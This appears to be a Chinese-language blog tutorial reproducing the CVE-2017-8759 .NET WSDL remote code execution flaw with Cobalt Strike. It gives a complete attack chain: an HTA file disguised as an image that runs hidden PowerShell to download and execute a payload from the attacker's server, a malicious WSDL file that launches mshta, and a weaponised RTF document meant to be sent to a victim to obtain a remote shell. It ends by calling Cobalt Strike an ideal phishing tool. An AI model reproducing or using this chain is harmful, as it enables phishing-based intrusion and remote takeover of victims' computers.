CVE-2017-8759 + Cobalt Strike 完美复现过程笔记
[TOC]
主要参考文章是来自
Lz1y
大神的文章:http://www.lz1y.cn/wordpress/?p=799
更新记录:
最新修改与:2017年9月28日
##工具
- https://github.com/Lz1y/CVE-2017-8759.git
- Cobalt Strike(请自行下载)
##步骤
- 在kali上面,执行命令
git clone https://github.com/Lz1y/CVE-2017-8759.git
- 进入cobalt strike目录,执行:
./teamserver 192.168.1.9 123456
- 在cobalt strike目录,执行
./cobaltstrike
运行cobalt strike客户端。 - 在cobalt strike中新建
Listener
,类型用http
的,端口输入80
。 - 进入该目录,依次修改以下文档:
5.1gedit cmd.jpg
(先cp cmd.hta cmd.jpg
)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32<html>
<head>
<script language="VBScript">
Sub window_onload
window.resizeTo 0,0
window.MoveTo -100,-100
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WScript.Shell")
Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.1.9:80/a')""",0,FALSE
window.close()
end sub
</script>
<!--
<script language="VBScript">
Sub window_onload
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WbemScripting.SWbemLocator")
Set Service = Locator.ConnectServer()
Service.Security_.ImpersonationLevel=impersonation
Set objStartup = Service.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set Process = Service.Get("Win32_Process")
Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID)
window.close()
end sub
</script>
-->
</head>
</html>
5.2gedit exploit.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22<definitions
xmlns="http://schemas.xmlsoap.org/wsdl/"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:suds="http://www.w3.org/2000/wsdl/suds"
xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
<portType name="PortType"/>
<binding name="Binding" type="tns:PortType">
<soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
<suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
</binding>
<service name="Service">
<port name="Port" binding="tns:Binding">
<soap:address location="http://192.168.1.9?C:\Windows\System32\mshta.exe?http://192.168.1.9/cmd.jpg"/>
<soap:address location=";
if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
} //"/>
</port>
</service>
</definitions>
以上两个文档的修改要与cobalt strike相对应 - 设置攻击环境:
6.1Attacks -> Web Drive-by -> Scripted Web Delivery
,启动一个powershell木马,设置如下图:
点击”Launch”之后,会生成一个一句话的Powershell代码,记住其中的网址部分,填写到cmd.jpg
中,替换掉url。
6.2Attacks -> Web Drive-by -> Host File
,将cmd.jpg
,一定要将Mime Type
修改为application/hta
,此处生成的URL
请填入exploit.txt
中相应的位置。
6.3Attacks -> Web Drive-by -> Host File
,将exploit.txt
,无需特殊设置,设置好Local URI
,点击Launch
,复制生成的URL。此URL
为CreateRTF.py
脚本-u
参数使用的。
6.3 使用大神的CreatRTF.py
生成一个rtf文档,url填写为Hostexploit.txt
时产生的url。
至此,步骤完成,将生成的rtf文档发送给目标,即可在cobalt strike teamserver上得到shell。
##注意事项
- 在设置
Listener
的时候,最好设置成’http’类型,若按照大神的指引选择HTTPS
,会有证书提示,无法达到完美效果;如果需要做’https’类型的,请参考[[[Cobalt Strike]域名前置技术+SSL部署]]1 - 请在完整版的Office中测试。这个坑我踩了,检查半天无法复现,结果是我的Office不完整,导致不能执行。
##总结
来看下Cobalt Strike的Teamserver 的 Weblog。
通过这里可以发现,当用户打开rtf的时候,目标会去根据exploit.txt
里面的url去访问cmd.jpg
,通过cmd.jpg
中的指令,目标会再次发送请求,访问/a
,这行到这里,说明目标正在使用powershell
执行我们的一句话,之后的/aGAs/
则是目标运行powershell脚本后访问的,至此,一个shell就会出现了。
明白了这个流程,我想大概也就明白各个URL
怎么配置了吧。
1 | 09/28 01:29:13 visit from: 12X.12X.9X.6X |
##闲话
- Cobalt Strike作为网络钓鱼攻击工具使用,简直完美了。
- 第一次文章中有些错误,2017年9月28日,已完成修改。给大家带来误导,请见谅!
- 修改了多次,有问题的直接留言吧。这次应该不会有问题了。